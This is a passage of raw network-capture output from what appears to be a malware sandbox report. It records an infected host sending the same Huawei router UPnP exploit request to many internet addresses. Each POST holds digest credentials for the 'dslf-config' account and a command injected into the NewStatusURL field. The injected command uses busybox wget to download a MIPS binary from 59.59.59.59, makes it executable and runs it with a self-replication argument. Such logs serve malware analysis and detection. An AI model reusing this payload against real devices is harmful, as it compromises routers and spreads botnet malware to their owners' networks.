2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          511192.168.2.1543346157.184.147.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.611985922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          512192.168.2.1542972157.15.97.7337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.612003088 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          513192.168.2.153983269.71.234.24937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.612023115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          514192.168.2.1557946125.246.110.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.612073898 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          515192.168.2.1549548207.134.191.20837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.612171888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          516192.168.2.1544994157.50.16.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.612221956 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          517192.168.2.1533776157.1.232.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.612678051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          518192.168.2.155819241.51.77.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.612968922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          519192.168.2.155037841.126.216.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.613049984 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          520192.168.2.153853641.235.254.19337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.613064051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          521192.168.2.1541828157.221.35.5737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.613078117 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
